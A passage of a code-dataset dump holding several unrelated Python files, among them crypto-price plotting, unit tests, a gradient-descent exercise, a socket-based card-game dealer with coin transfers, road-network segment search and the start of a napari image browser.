width=1)\nplt.bar(range(np.size(s0)),s1,color='r', bottom=s0,label = 'High Variance, Stable', width=1)\nplt.bar(range(np.size(s0)),s2,color='b', bottom=s0+s1,label = 'Low Variance, Trending', width=1)\nplt.bar(range(np.size(s0)),s3,color='c', bottom=s0+s1+s2,label = 'High Variance, Trending', width=1)\n\n\nplt.legend(loc = 'lower left')\nplt.show()\n\nx,beta = RTSLinearSmoother(p,V,f,F,w,5)\nprint('x[5]',x[5])\nmass_aprox = np.zeros(shape = [S,T])\nfor t in range(T):\n for s in range(S):\n mass_aprox[s, t] = sum(sum(x[t][s]))\n\nprint('mass check sum 1',np.sum(mass_aprox,axis=0))\nfig, ax1 = plt.subplots()\nax1.plot(df2['time'],df2['vwap'],c='k')\n\n\nax1.set_title('BTCUSD VWAP')\nax2 = ax1.twinx()\n\nplt.show()\n\nplt.bar(range(np.size(mass_aprox[0])), mass_aprox[0],color='g', label='Low Variance, Stable', width=1, alpha = .5)\nplt.bar(range(np.size(mass_aprox[0])),mass_aprox[1],color='r', bottom=mass_aprox[0],label = 'High Variance, Stable', width=1, alpha = .5)\nplt.bar(range(np.size(mass_aprox[0])),mass_aprox[2],color='b', bottom=mass_aprox[0]+mass_aprox[1],label = 'Low Variance, Trending', width=1, alpha = .5)\nplt.bar(range(np.size(mass_aprox[0])),mass_aprox[3],color='c', bottom=mass_aprox[0]+mass_aprox[1]+mass_aprox[2],label = 'High Variance, Trending', width=1, alpha = .5)\n\nplt.legend(loc = 'lower left')\nplt.twinx()\nplt.plot(df2['vwap'].tolist(),label='VWAP',c='k')\nplt.show()\n\n\n","sub_path":"SRLDS/btcusd_volatility_levels.py","file_name":"btcusd_volatility_levels.py","file_ext":"py","file_size_in_byte":4713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"319812140","text":"from unittest import TestCase\n\nfrom src.pdf_processing.utils.WordTokenizer import removeCommonWordsAndTokenize\n\n\nclass WordTokenizeTest(TestCase):\n\n def test_english_sentence_splitter(self):\n sentence = \"9 šis teikums saSTāv no burtiem a b c 33333333 \"\n words = removeCommonWordsAndTokenize(sentence)\n\n for a in words:\n print(a)\n\n correctWords = ['SKAITLIS', 'šis', 'teikums', 'sastāv', 'burtiem', 'SKAITLIS']\n self.assertTrue(words == correctWords)\n","sub_path":"test/pdf_processing/utils/test_WordTokenize.py","file_name":"test_WordTokenize.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"180869804","text":"import numpy as np\r\nimport pandas as pd\r\nfrom sklearn.linear_model import LinearRegression\r\nimport math\r\n#trovo m e b con il classico sklearn\r\ndef predict_using_sklearn() :\r\n df = pd.read_csv(\"test_scores.csv\")\r\n r = LinearRegression()\r\n r.fit(df[[\"math\"]],df.cs)\r\n return r.coef_,r.intercept_\r\n\r\n\r\n#adesso uso il gradiend descend per trovare sempre il coefficente e l'intercetta\r\n\r\ndef gradient_descend(x,y): \r\n m_curr=0\r\n b_curr=0\r\n iterations=1000000\r\n n=len(x)\r\n learning_rate=0.0002\r\n cost_previous=0\r\n \r\n for i in range(iterations):\r\n y_predicted = m_curr*x + b_curr\r\n cost= (1/n)*sum([value**2 for value in (y-y_predicted)])\r\n md = -(2/n)*sum(x*(y-y_predicted))\r\n bd = -(2/n)*sum(y-y_predicted)\r\n m_curr = m_curr - learning_rate*md\r\n b_curr = b_curr - learning_rate*bd\r\n if math.isclose(cost,cost_previous,rel_tol=1e-20):\r\n break\r\n cost_previous=cost\r\n print(\"m {},b {},cost {}, iteration {}\".format(m_curr,b_curr,cost,i))\r\n \r\n \r\n return m_curr,b_curr \r\n\r\nif __name__ ==\"__main__\":\r\n df = pd.read_csv(\"test_scores.csv\")\r\n x= np.array(df.math)\r\n y= np.array(df.cs)\r\n \r\n \r\n m,b = gradient_descend(x,y)\r\n print(\"using gradiend descend function: Coef {}, Intercept {}\".format(m,b))\r\n \r\n \r\n m_sklearn,b_sklearn =predict_using_sklearn()\r\n print(\"using sklearn: Coef {}, Intercep {}\".format(m_sklearn,b_sklearn))","sub_path":"MACHINE LEARNING CODEBASICS/Gradient Descent and cost function/exercise.py","file_name":"exercise.py","file_ext":"py","file_size_in_byte":1467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"186046437","text":"class student:\n age = 0\n name = \"\"\n score = 0\n\n # python中的类也是有那些访问属性的\n # 上面的那三个属于类的公有属性\n # 在类的内部调用私有方法或私有成员必需使用self关键字self.__名字\n\n __pri = 3 # 双下划线开头的成员为私有成员,不能在类的外部被访问\n _pro = 2 # 一个下划线是保护成员\n\n def getPri(self): # 在定义一个类的方法的过程中,类的方法必需包含self参数,而且self参数要放在第一位\n return self.__pri # self就相当于C++中的this指针\n\n def setPri(self, pri):\n self.__pri = pri\n\n def fun(self):\n print('Hello World')\n\n # 下面来看看类的专有方法\n # 类的专有方法无非就是构造函数,析构函数,或者一些类似于C++重载运算符的函数\n def __init__(self, name, age, score): # 构造函数\n self.name = name\n self.age = age\n self.score = score\n\n def __del__(self): # 析构函数\n del self.name\n del self.age\n del self.score\n print('__del__')\n\n def __add__(self, other): # 这就类似于是一个重载运算符,而且只能重载一个运算符\n return self.age + other.age\n\n def __repr__(self): # 打印,转换\n return self.name\n\n def __setitem__(self, key, value): # 按照索引赋值\n if key == 1:\n self.name = value\n else:\n self.score = value\n\n def __getitem__(self, item):\n if item == 1:\n return self.name\n else:\n return self.score\n\n\na = student('lyst', 18, 100) # 实例化一个对象a,并调用了构造函数\na.fun() # 调用类中的函数\nprint(\"student's age is \", a.age)\nprint(a._pro)\na.setPri(5) # 可以忽略第一个self参数\nprint(a.getPri())\nb = student('wth', 19, 100)\nprint(a + b)\nprint(a)\n# 按照索引赋值和按照索引获取值\na.__setitem__(1, \"liuinstein\")\nprint(a.__getitem__(1))\n\n","sub_path":"08_类和对象/08_类和对象.py","file_name":"08_类和对象.py","file_ext":"py","file_size_in_byte":1985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"115666302","text":"\"\"\"Module unit tests.\n\nThis module is use for do unit test to each function from primeNumber.py\n\"\"\"\n# Author: Barbana Klimekova \n# Lucia Kubaskova \n# Tomas_Prikasky \n#\n# Description: Create unit tests to validate units from primeNumber.py\n# Units: functions isPrimeNumber(), printDivisors()\n# TestCases: 1. prime number validation\n# 2. non-prime number validation\n# 3. dividors validation\n# 4. printed outputs validation\nimport builtins\nfrom primeNumber import isPrimeNumber, getDivisors, main\nimport unittest\nfrom unittest.mock import patch\n\n\nclass TestPrimeNumber(unittest.TestCase):\n \"\"\"Class TestPrimeNumber for testing function primeNumber().\n\n ...\n Attributes\n ----------\n - number : int\n - we are testing numbers 5 and 10, 5 as prime number,\n 10 as non-prime number\n - vypis: str\n - the string value that is printed as a result into console\n Methods\n -------\n test_fiveIsPrimeNumber(self, ):\n - Function validates that entered number 5 is prime number\n test_tenIsNotPrimeNumber(self, ):\n - Function validates that number 10 is non-prime number\n \"\"\"\n\n def test_isPrime(self, ):\n \"\"\"Function test for isPrimeNumber.\n\n Parameters:\n - number (int): tested number 5\n Returns:\n - output (str): String printed into console,\n statement if number is prime number\n \"\"\"\n self.assertEqual(isPrimeNumber(5), True)\n self.assertEqual(isPrimeNumber(6), False)\n self.assertEqual(isPrimeNumber(8), False)\n\n def test_getDivisors(self, ):\n \"\"\"Function test for isPrimeNumber.\n\n Parameters:\n - number (int): tested number 5\n Returns:\n - output (str): String printed into console,\n statement if number is prime number\n \"\"\"\n self.assertEqual(getDivisors(5), [1, 5])\n self.assertEqual(getDivisors(6), [1, 2, 3, 6])\n\n\nclass TestPrintedValues(unittest.TestCase):\n \"\"\"Class TestPrintedValues for testing function printDivisors().\n\n ...\n Attributes\n ----------\n - number : int\n - We are testing numbers 5 and 44, 5 for evaluating\n number of divisors and 44 for evaluating values of divisors\n - dividers: int[]\n - List of integers - dividers\n - counter: int\n - Number of dividers\n Methods\n -------\n test_numberOfDivisors(self, ):\n - Function validates the number of dividers\n test_printedValues(self, ):\n - Function validates if after evaluation the\n divisors are printed into console\n \"\"\"\n\n @patch('builtins.input', side_effect=['-1'])\n def test_main_negative(self, _):\n \"\"\"Function for negative main test usecase.\"\"\"\n print_values = []\n builtins.print = lambda s: print_values.append(s)\n main()\n assert print_values == [\"Nebylo zadáno kladne číslo\"]\n\n @patch('builtins.input', side_effect=['foo'])\n def test_main_string(self, _):\n \"\"\"Function for string test usecase.\"\"\"\n print_values = []\n builtins.print = lambda s: print_values.append(s)\n main()\n assert print_values == [\"Nebylo zadáno číslo\"]\n\n# print documentation using pydoc.\n# print documentation for class\n","sub_path":"test_primeNumber.py","file_name":"test_primeNumber.py","file_ext":"py","file_size_in_byte":3610,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"393907504","text":"# Copyright (c) Stephen Finucane, 2019\n# See LICENSE for details.\n\n\"\"\"\nCreate a new fragment.\n\"\"\"\n\nfrom __future__ import absolute_import\n\nimport os\nimport click\n\nfrom ._settings import load_config_from_options\n\n\n@click.command(name=\"create\")\n@click.option(\"--dir\", \"directory\", default=None)\n@click.option(\"--config\", \"config\", default=None)\n@click.argument(\"filename\")\ndef _main(directory, config, filename):\n return __main(directory, config, filename)\n\n\ndef __main(directory, config, filename):\n \"\"\"\n The main entry point.\n \"\"\"\n base_directory, config = load_config_from_options(directory, config)\n\n definitions = config[\"types\"] or []\n if len(filename.split(\".\")) < 2 or (\n filename.split(\".\")[-1] not in definitions\n and filename.split(\".\")[-2] not in definitions\n ):\n raise click.BadParameter(\n \"Expected filename '{}' to be of format '{{name}}.{{type}}', \"\n \"where '{{name}}' is an arbitrary slug and '{{type}}' is \"\n \"one of: {}\".format(filename, \", \".join(definitions))\n )\n\n if config.get(\"directory\"):\n fragments_directory = os.path.abspath(\n os.path.join(base_directory, config[\"directory\"])\n )\n else:\n fragments_directory = os.path.abspath(\n os.path.join(\n base_directory,\n config[\"package_dir\"],\n config[\"package\"],\n \"newsfragments\",\n )\n )\n\n if not os.path.exists(fragments_directory):\n os.makedirs(fragments_directory)\n\n segment_file = os.path.join(fragments_directory, filename)\n if os.path.exists(segment_file):\n raise click.ClickException(\"{} already exists\".format(segment_file))\n\n with open(segment_file, \"w\") as f:\n f.writelines([\"Add your info here\"])\n\n click.echo(\"Created news fragment at {}\".format(segment_file))\n\n\nif __name__ == \"__main__\": # pragma: no cover\n _main()\n","sub_path":"src/towncrier/create.py","file_name":"create.py","file_ext":"py","file_size_in_byte":1947,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"582988197","text":"from django.urls import reverse\n\nfrom applications.subscription.models import Post\nfrom applications.subscription.tests.factories import PostFactory\n\n\nHTTP_200_OK = 200\nHTTP_302_REDIRECT = 302\nHTTP_404_NOT_FOUND = 404\n\n\ndef test_post_list(user_logged_client, user):\n for _ in range(3):\n PostFactory()\n\n for _ in range(3):\n PostFactory(user=user)\n\n url = reverse('subscription:post_list_view')\n response = user_logged_client.get(url)\n assert response.status_code == HTTP_200_OK\n assert (\n set(response.context_data['object_list']) ==\n set(Post.objects.filter(user=user))\n )\n\n\ndef test_post_detail(user_logged_client, user):\n post_out_of_view = PostFactory()\n post_in_view = PostFactory(user=user)\n\n url = reverse(\n 'subscription:post_detail_view',\n kwargs={'pk': post_in_view.pk}\n )\n response = user_logged_client.get(url)\n\n assert (\n set([response.context_data['object'], ]) ==\n set(Post.objects.filter(user=user))\n )\n\n url = reverse(\n 'subscription:subscription_detail_view',\n kwargs={'pk': post_out_of_view.pk}\n )\n response = user_logged_client.get(url)\n assert response.status_code == HTTP_404_NOT_FOUND\n\n\ndef test_post_mark_as_read(user_logged_client, user):\n post = PostFactory(user=user, is_read=False)\n assert not post.is_read\n\n url = reverse('subscription:post_detail_view', kwargs={'pk': post.pk})\n user_logged_client.get(url)\n\n post.refresh_from_db()\n assert post.is_read\n\n\ndef test_post_update(user_logged_client, user):\n post = PostFactory(\n user=user,\n is_favourite=False,\n comment=''\n )\n assert not post.is_favourite\n assert post.comment == ''\n\n url = reverse('subscription:post_update_view', kwargs={'pk': post.pk})\n data = {\n 'is_favourite': True,\n 'comment': 'COMMENT'\n }\n response = user_logged_client.post(url, data, follow=True)\n assert response.status_code == HTTP_200_OK\n\n post.refresh_from_db()\n assert post.is_favourite == data['is_favourite']\n assert post.comment == data['comment']\n\n assert response.context_data['object'].is_favourite == data['is_favourite']\n assert response.context_data['object'].comment == data['comment']\n\n\ndef test_post_new(user_logged_client, user):\n for _ in range(2):\n PostFactory(user=user, is_read=True)\n\n for _ in range(3):\n PostFactory(user=user, is_read=False)\n\n url = reverse('subscription:post_new_view')\n response = user_logged_client.get(url)\n assert response.status_code == HTTP_200_OK\n assert response.context_data['object_list'].count() == 3\n assert (\n set(response.context_data['object_list']) ==\n set(Post.objects.filter(user=user, is_read=False))\n )\n\n\ndef test_post_favourites(user_logged_client, user):\n for _ in range(3):\n PostFactory(user=user, is_favourite=False)\n\n for _ in range(2):\n PostFactory(user=user, is_favourite=True)\n\n url = reverse('subscription:post_favourites_view')\n response = user_logged_client.get(url)\n assert response.status_code == HTTP_200_OK\n assert response.context_data['object_list'].count() == 2\n assert (\n set(response.context_data['object_list']) ==\n set(Post.objects.filter(user=user, is_favourite=True))\n )\n","sub_path":"feedo/applications/subscription/tests/test_posts.py","file_name":"test_posts.py","file_ext":"py","file_size_in_byte":3332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"98526768","text":"\nimport socket\nimport pickle\nimport threading\nimport re\nfrom random import randint\nimport time\nfrom tkinter import *\nfrom tkinter import font\nimport os\nfrom tkinter import messagebox\nfrom coins import *\nclients=[]\nname=[]\nclient_id=-1\ntimer=-1\nserver=13\ndraw=0\nclient=13\nroot = None\nmain = Tk()\nnr1=0\nw=None\nnr2=0\nbalance=0\nabort=0\np1=[\"2C.png\",\"3C.png\",\"4C.png\",\"5C.png\",\"6C.png\",\"7C.png\",\"8C.png\",\"9C.png\",\"10C.png\",\"JC.png\",\"QC.png\",\"KC.png\",\"AC.png\",\"pack.png\"]\np2=[\"2S.png\",\"3S.png\",\"4S.png\",\"5S.png\",\"6S.png\",\"7S.png\",\"8S.png\",\"9S.png\",\"10S.png\",\"JS.png\",\"QS.png\",\"KS.png\",\"AS.png\",\"pack.png\"]\np3=[\"2H.png\",\"3H.png\",\"4H.png\",\"5H.png\",\"6H.png\",\"7H.png\",\"8H.png\",\"9H.png\",\"10H.png\",\"JH.png\",\"QH.png\",\"KH.png\",\"AH.png\",\"pack.png\"]\np4=[\"2D.png\",\"3D.png\",\"4D.png\",\"5D.png\",\"6D.png\",\"7D.png\",\"8D.png\",\"9D.png\",\"10D.png\",\"JD.png\",\"QD.png\",\"KD.png\",\"AD.png\",\"pack.png\"]\nsignal=\"\"\nsignal_disconnected=\"\"\nwin_loose=\"\"\nusername=StringVar()\naddress=StringVar()\npassword=StringVar()\nport=StringVar()\n# username.set(\"user3070554556\")\n# password.set(\"pass6e261696532cd591acf639b17af3c17b1dd3fc09af4b609863d6698590b1555299\")\n# address.set(\"RGwNq9jdiD3B9WcjY14SkPawb8iVhXPQwT\")\n# port.set(11060)\nclass handle_client(threading.Thread):\n def __init__(self):\n threading.Thread.__init__(self)\n def run(self):\n s=socket.socket()\n port=7398\n s.bind(('',port))\n s.listen(5)\n flag=0\n count=0\n while(True):\n c, addr = s.accept()\n if(len(clients)==0):\n count=1\n else:\n x=sorted(clients)\n count=int(x[len(clients)-1])+1\n t=myThread(c,count)\n t.start()\nclass myThread(threading.Thread):\n def __init__(self,c,id):\n threading.Thread.__init__(self)\n self.c=c\n self.id=id\n self.n=\"\"\n self.msg=100\n self.client_num=13\n self.dealer_num=13\n self.caddress=\"\"\n def run(self):\n err=0\n clients.append(self.id)\n global signal_disconnected\n if(len(clients)==4):\n clients.remove(self.id)\n self.msg = 404\n data = pickle.dumps(self.msg)\n self.c.send(data)\n else:\n global timer,server,client,nr1,nr2,win_loose,balance,w\n send_num=-1\n while (True):\n if(abort==1):\n break\n try:\n if(self.msg==100):\n self.msg=\"201\"+\":\"+address.get()\n elif(send_num==0):\n num=randint(0,12)\n self.dealer_num=num\n server=num\n nr1=randint(0,3)\n self.msg=\"num:\"+str(num)+\":\"+str(nr1)\n else:\n self.msg=200\n data = pickle.dumps(self.msg)\n self.c.send(data)\n rdata = pickle.loads(self.c.recv(1024))\n if(send_num==0):\n display=rdata\n dummy,x,y=rdata.split(\":\")\n x=int(x)\n y=int(y)\n self.client_num=x\n client=x\n nr2=y\n send_num=1\n if(rdata==700):\n send_num=0\n if(re.search(\"^201:*\",str(self.msg))!=None):\n self.caddress=rdata\n if(rdata in name):\n self.msg=400\n data = pickle.dumps(self.msg)\n self.c.send(data)\n raise(\"Client is already connected\")\n else:\n self.n=rdata\n name.append(self.n)\n self.msg=200\n if(re.search(\"^num:*\",str(rdata))!=None):\n display=rdata\n dummy,x,y=rdata.split(\":\")\n x=int(x)\n y=int(y)\n self.client_num=x\n client=x\n nr2=y\n if(self.client_num!=13 and self.dealer_num!=13):\n if(self.client_num>=self.dealer_num):\n win_loose=\"You lost 10 chips\"\n w.send(self.n)\n else:\n win_loose=\"You won 10 chips\"\n w.recv(address.get())\n self.client_num=13\n self.dealer_num=13\n except Exception as e:\n err=1\n if(self.n!=\"\"):\n signal_disconnected=str(self.n)+\" disconnected\"\n clients.remove(self.id)\n if(self.n!=\"\"):\n name.remove(self.n)\n break\nmyFont = font.Font(size=15)\nmyFont1 = font.Font(size=15)\nLabel(main).pack()\nlabel_add=Label(main,text=\"Enter your username\")\nlabel_add['font']=myFont\nlabel_add.pack()\nLabel(main).pack()\nuser=Entry(main,textvariable=username)\nuser['font']=myFont\nuser.pack()\nLabel(main).pack()\nLabel(main).pack()\nlabel_add=Label(main,text=\"Enter your password\")\nlabel_add['font']=myFont\nlabel_add.pack()\nLabel(main).pack()\nuser1=Entry(main,textvariable=password)\nuser1['font']=myFont\nuser1.pack()\nLabel(main).pack()\nlabel_add=Label(main,text=\"Enter your address\")\nlabel_add['font']=myFont\nlabel_add.pack()\nLabel(main).pack()\nuser2=Entry(main,textvariable=address)\nuser2['font']=myFont\nuser2.pack()\nLabel(main).pack()\nlabel_add=Label(main,text=\"Enter port number\")\nlabel_add['font']=myFont\nlabel_add.pack()\nLabel(main).pack()\nuser3=Entry(main,textvariable=port)\nuser3['font']=myFont\nuser3.pack()\nLabel(main).pack()\ndef newwindow():\n global root,w\n w=coins(username.get(),password.get(),port.get())\n balance=w.getbalance()\n if(w.login()):\n main.withdraw()\n root=Toplevel()\n def close_window():\n root.destroy()\n os._exit(0)\n def retry():\n global draw\n draw=1\n root.geometry(\"800x900\")\n Label(root).pack()\n hc=handle_client()\n hc.start()\n Label(main).pack()\n warning=Label(main,text=\"\")\n warning['font']=myFont\n warning.pack()\n Label(main).pack()\n logo = PhotoImage(file=\"resources/\"+\"chip1.png\")\n w1 = Label(root, image=logo).pack()\n Label(root).pack()\n dstatus=Label(root)\n dstatus['font']=myFont1\n dstatus.pack()\n Label(root).pack()\n dealer=Label(root,text=\"Dealer's card\")\n dealer['font']=myFont\n dealer.pack()\n Label(root).pack()\n lab = Label(root)\n lab['font']=myFont1\n photo = PhotoImage(file=\"resources/\"+\"pack.png\")\n lab.config(image=photo)\n lab.pack()\n Label(root).pack()\n player=Label(root,text=\"Player's card\")\n player['font']=myFont\n player.pack()\n Label(root).pack()\n lab1 = Label(root)\n lab1['font']=myFont\n photo1 = PhotoImage(file=\"resources/\"+\"pack.png\")\n lab1.config(image=photo1)\n lab1.pack()\n Label(root).pack()\n warning=Label(root)\n warning['font']=myFont\n warning.pack()\n def update():\n dstatus.config(text=\"Current balance : $\"+w.getbalance())\n warning.config(text=win_loose)\n if(float(balance)<10):\n print(\"Insufficient amount of money to play please add some money and then try again\")\n os._exit(0)\n if(nr1==0):\n x1=p1\n elif(nr1==1):\n x1=p2\n elif(nr1==2):\n x1=p3\n else:\n x1=p4\n if(nr2==0):\n x2=p1\n elif(nr2==1):\n x2=p2\n elif(nr2==2):\n x2=p3\n else:\n x2=p4\n photo = PhotoImage(file=\"resources/\"+x1[int(server)])\n photo1 = PhotoImage(file=\"resources/\"+x2[int(client)])\n lab.config(image=photo)\n lab1.config(image=photo1)\n lab.image=photo\n lab1.image=photo1\n root.after(100, update)\n update()\n Label(root).pack()\n def doSomething():\n os._exit(0)\n root.protocol('WM_DELETE_WINDOW', doSomething)\n root.mainloop()\n else:\n warning.config(text=\"Invalid Credential please try again\")\n password.set(\"\")\n address.set(\"\")\n username.set(\"\")\nbtn=Button(main,text=\"Login and play\",command=newwindow)\nbtn['font']=myFont\nbtn.pack()\nmain.geometry(\"600x600\")\ndef doSomething():\n os._exit(0)\nmain.protocol('WM_DELETE_WINDOW', doSomething)\nmain.mainloop()","sub_path":"dealer.py","file_name":"dealer.py","file_ext":"py","file_size_in_byte":8979,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"221271821","text":"import geopandas as gpd\nimport networkx as nx\nimport matplotlib.pyplot as plt\nimport osmnx as ox\nimport numpy as np\nimport shapely.geometry as geom\nimport h5py as h5\n\nclass segment:\n def __init__(self, edge = None):\n if edge is None:\n #Do nothing\n pass\n else:\n #initialize with given node as segment\n self.start_node = edge[0]\n self.num = 1\n self.path = np.array(edge[1:3],dtype = [('node','i4'),('id','i4')])\n self.past_node = self.start_node\n self.last_node = edge[1]\n self.length = edge[-1]['length']\n self.angle = edge[-1]['angle']\n self.edgelist = {edge[:3]:True}\n self.total_angle = np.array([0],dtype = np.float32)\n\n def expand(self, edge):\n '''return copy of segment appending extra edge '''\n temp = segment()\n temp.start_node = self.start_node\n temp.past_node = edge[0]\n temp.last_node = edge[1]\n temp.num = self.num+1\n temp.path = np.empty([temp.num],dtype = [('node','i4'),('id','i4')])\n temp.path[:-1] = self.path\n temp.path[-1] = edge[1:3]\n temp.length = self.length + edge[-1]['length']\n temp.angle = edge[-1]['angle']\n temp.edgelist = {edge[:3]:True}\n for e in self.edgelist:\n temp.edgelist[e] = True\n temp.total_angle = np.zeros([temp.num],dtype = np.float32)\n temp.total_angle[:-1] = self.total_angle + temp.angle- self.angle\n return temp\n\n def check(self, k):\n '''check condition of k segments'''\n return self.length> k or self.total_angle[-1]<-2*np.pi or self.total_angle[-1]>2*np.pi #(self.total_angle <-2*np.pi).any() or (self.total_angle > 2*np.pi).any()\n\n def overlap(self, edge):\n '''check overlap with given edge'''\n if self.num == 1:\n return False\n return edge[:3] in self.edgelist\n\n def __repr__(self):\n return \"\".format(self.start_node, self.last_node, self.num)\n\n def __lt__(self, other):\n '''sorting'''\n return self.lengthother.length\n\n def __le__(self, other):\n '''sorting'''\n return self.length<=other.length\n\n def __ge__(self, other):\n '''sorting'''\n return self.length>=other.length\n\n def edges(self):\n '''return edgelist'''\n e = []\n temp = self.start_node\n for p in self.path:\n e.append((temp,p['node'],p['id']))\n temp = p['node']\n return e\n\n def nodes(self):\n '''return node list'''\n n = [self.start_node]\n if self.num == 1:\n n.append(self.path['node'])\n return n\n for p in self.path:\n n.append(p['node'])\n return n\n\n def plot(self, pos, *arg,**kwarg):\n '''plot segment in aspect of graph'''\n temp = nx.path_graph(self.num+1,create_using=nx.DiGraph)\n position = {}\n for i,n in enumerate(self.nodes()):\n position[i] = pos[n]\n nx.draw(temp, position, *arg, **kwarg)\n\n def stitch_score(self, other):\n pass\n\n\nclass Roadnetwork(nx.MultiDiGraph):\n def __init__(self):\n self.__super__(self)\n\n def pos():\n doc = '''return position dictionay'''\n def fget(self):\n return self.nodes(data = 'pos')\n return locals()\n pos = property(**pos())\n\n\n def subgraph_of_node(self, node, depth_limit = 2):\n \"\"\"return subgraph of given node with bfs manner\n\n Parameters\n ----------\n node : type\n Description of parameter `node`.\n depth_limit : type\n Description of parameter `depth_limit`.\n\n Returns\n -------\n type\n Description of returned object.\n\n \"\"\"\n\n nodes = {node : 0}\n for edge in nx.bfs_edges(self, node, depth_limit= depth_limit):\n nodes[edge[1]] = 0\n\n nodes = list(nodes.keys())\n if depth_limit == 0:\n nodes = [node]\n return self.subgraph(nodes)\n\n def nn_nodes(G, node, depth_limit = 2):\n '''return nodes from given node with bfs manner'''\n nodes = {node : 0}\n for edge in nx.bfs_edges(G, node, depth_limit= depth_limit):\n nodes[edge[1]] = 0\n\n nodes = list(nodes.keys())\n if depth_limit == 0:\n nodes = [node]\n return nodes\n\n\n\n def edge_plot(G):\n '''plot edges in given graph'''\n for i in G.edges(data = 'geometry'):\n plt.plot(*i[2].xy)\n\n def edgelist_plot(G, edgelist):\n '''plot edges in given edgelist '''\n for edge in edgelist:\n plt.plot(*G.edges[edge]['geometry'].xy)\n\n def subgraph_plot(G, node, depth_limit = 2):\n '''making subgraph and plot'''\n sub = subgraph_of_node(G,node, depth_limit)\n node_pos = pos(sub)[node]\n\n edge_plot(sub)\n plt.scatter(*node_pos, s= 100)\n\n\n\n\n\ndef k_segments(G, node, k= 100):\n '''k_segments with only breadth-first searching'''\n segments = [segment(edge) for edge in G.edges(node,keys = True, data = True)]\n k_segments = []\n iter_num = 0\n while segments:\n iter_num += 1\n target = segments.pop(0)\n ch = False\n #print(\"target : {},{}\".format(target.past_node, target.last_node))\n for edge in G.edges(target.last_node, keys = True, data = True):\n if edge[1] == target.past_node or target.overlap(edge): continue\n #print(\"to : {}, {}\".format(edge[0], edge[1]))\n ch = True\n temp = target.expand(edge)\n if temp.check(k):\n k_segments.append(temp)\n else:\n segments.append(temp)\n if not ch:\n k_segments.append(target)\n if iter_num == 1e5:\n print(node)\n #print(k_segments)\n return k_segments\n\ndef k_segments_strict_bfs(G, node, k= 100):\n '''no overlapping node'''\n segments = [segment(edge) for edge in G.edges(node,keys = True, data = True)]\n k_segments = []\n nodes = {node :True}\n iter_num = 0\n while segments:\n iter_num += 1\n target = segments.pop(0)\n ch = False\n #print(\"target : {},{}\".format(target.past_node, target.last_node))\n for edge in G.edges(target.last_node, keys = True, data = True):\n if edge[1] in nodes: continue\n #print(\"to : {}, {}\".format(edge[0], edge[1]))\n ch = True\n nodes[edge[1]] = True\n temp = target.expand(edge)\n if temp.check(k):\n k_segments.append(temp)\n else:\n segments.append(temp)\n #if not ch:\n #k_segments.append(target)\n if iter_num == 1e5:\n print(node)\n #print(k_segments)\n return k_segments\n\ndef k_segments_strict_bfs_with_length(G, node, k= 100):\n '''no overlapping node and search with length.'''\n segments = [segment(edge) for edge in G.edges(node,keys = True, data = True)]\n k_segments = []\n nodes = {node :True}\n iter_num = 0\n segments.sort()\n while segments:\n iter_num += 1\n target = segments.pop(0)\n ch = False\n #print(\"target : {},{}\".format(target.past_node, target.last_node))\n for edge in G.edges(target.last_node, keys = True, data = True):\n if edge[1] in nodes: continue\n #print(\"to : {}, {}\".format(edge[0], edge[1]))\n ch = True\n nodes[edge[1]] = True\n temp = target.expand(edge)\n if temp.check(k):\n k_segments.append(temp)\n else:\n segments.append(temp)\n if not ch:\n k_segments.append(target)\n if iter_num == 1e5:\n print(node)\n #print(k_segments)\n segments.sort()\n return k_segments\n\ndef k_segments_semi_strict_bfs(G, node, k= 100):\n '''no overlap within single segment.'''\n segments = [segment(edge) for edge in G.edges(node,keys = True, data = True)]\n k_segments = []\n nodes = {node :True}\n iter_num = 0\n while segments:\n iter_num += 1\n target = segments.pop(0)\n ch = False\n #print(\"target : {},{}\".format(target.past_node, target.last_node))\n for edge in G.edges(target.last_node, keys = True, data = True):\n if edge[1] in target.nodes(): continue\n #print(\"to : {}, {}\".format(edge[0], edge[1]))\n ch = True\n nodes[edge[1]] = True\n temp = target.expand(edge)\n if temp.check(k):\n k_segments.append(temp)\n else:\n segments.append(temp)\n #if not ch:\n #k_segments.append(target)\n if iter_num == 1e5:\n print(node)\n #print(k_segments)\n return k_segments\n","sub_path":"taxidata/core/network/ksegment.py","file_name":"ksegment.py","file_ext":"py","file_size_in_byte":8956,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"69194080","text":"# -*- coding: utf-8 -*-\n\n#################################################################\n# File : napari_browser_cz.py\n# Version : 0.0.6\n# Author : czsrh\n# Date : 18.01.2020\n# Institution : Carl Zeiss Microscopy GmbH\n#\n# Disclaimer: This tool is purely experimental. Feel free to\n# use it at your own risk.\n#\n# Copyright (c) 2020 Carl Zeiss AG, Germany. All Rights Reserved.\n#\n#################################################################\n\nfrom PyQt5.QtWidgets import (\n\n QHBoxLayout,\n QVBoxLayout,\n QFileSystemModel,\n QFileDialog,\n QTreeView,\n QDialogButtonBox,\n QWidget,\n QTableWidget,\n QTableWidgetItem,\n QCheckBox,\n QAbstractItemView,\n QComboBox,\n QPushButton,\n QLineEdit,\n QLabel,\n QGridLayout\n\n)\n\nfrom PyQt5.QtCore import Qt, QDir, QSortFilterProxyModel\nfrom PyQt5.QtCore import pyqtSlot\nfrom PyQt5 import QtCore, QtGui, QtWidgets\nfrom PyQt5.QtGui import QFont\n\nimport napari\nimport numpy as np\nimport md_tools as imf\nfrom aicsimageio import AICSImage\nimport dask.array as da\nimport os\nfrom zencontrol import ZenExperiment, ZenDocuments\nfrom pathlib import Path\n\n\nclass TableWidget(QWidget):\n\n def __init__(self):\n super(QWidget, self).__init__()\n self.layout = QVBoxLayout(self)\n self.mdtable = QTableWidget()\n self.layout.addWidget(self.mdtable)\n self.mdtable.setShowGrid(True)\n 